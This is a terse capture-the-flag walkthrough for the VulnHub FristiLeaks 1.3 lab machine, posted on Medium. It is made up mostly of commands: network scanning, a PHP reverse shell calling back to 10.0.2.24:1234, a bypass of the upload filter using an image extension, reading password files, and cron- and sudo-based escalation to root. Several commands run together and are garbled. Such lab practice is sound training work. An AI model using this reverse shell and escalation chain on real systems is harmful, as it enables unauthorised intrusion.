VulnHub: FRISTILEAKS: 1.3

  1. Network Discovery
nmap -sn 10.0.2.24/24
nmap -Pn 10.0.2.12
nmap -A -p80 10.0.2.12
nmap --script vuln -p80 10.0.2.12
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.12/ -x php,txt,html,sh,cgi
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.2.24/1234 0>&1'");
?>
rlwrap nc -lvp 1234
mv shell.php shell.jpg
http://10.0.2.12/fristi/uploads/shell.jpg
cp shell.php shell.php.jpg
whoami
cat /etc/passwd
ls -la /etc/passwd
ls -la /etc/shadow
cat notes.txt
echo "/home/admin/chmod 777 /home/admin" > /tmp/runthiscd /tmpls -la
cd /home/adminls -la
cat crobjob.py
cat cryptedpass.txtcat whoisyourgodnow.txt
def decodeString(str):
base64string = codecs.decode(str[::-1], 'rot13')
return base64.b64decode(base64string)
su fristigod
sudo -l
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bashwhoami
cd /rootls -lacat fristileaks_secrets.txt

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

The Journey to a Universal iOS App at John Lewis

Robot Path Planning. RRT Algorithm.

ONEMOON x Im Community AMA Recap

Alternating Characters HackerRank Problem

Matrix Led telling how good you are at playing League of Legends

【Introduction(2)】Building your own database through TEJ API

What is Linked List ?

Why is a Redundancy Plan Must For Cloud Hosting?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ratiros01

ratiros01

OSCP

More from Medium

The three Trigger mechanisms to prompt user return every indiemaker can use Part 1/3: Call to…

Bondex is committed to decentralizing elements of the ecosystem where doing so adds value and…

Washington Wizards vs Sacramento Kings Prediction, 12/15/2021 NBA Picks, Best Bets & Odds

Solidarity Festival with SPT and something else — The power of collective healing wisdom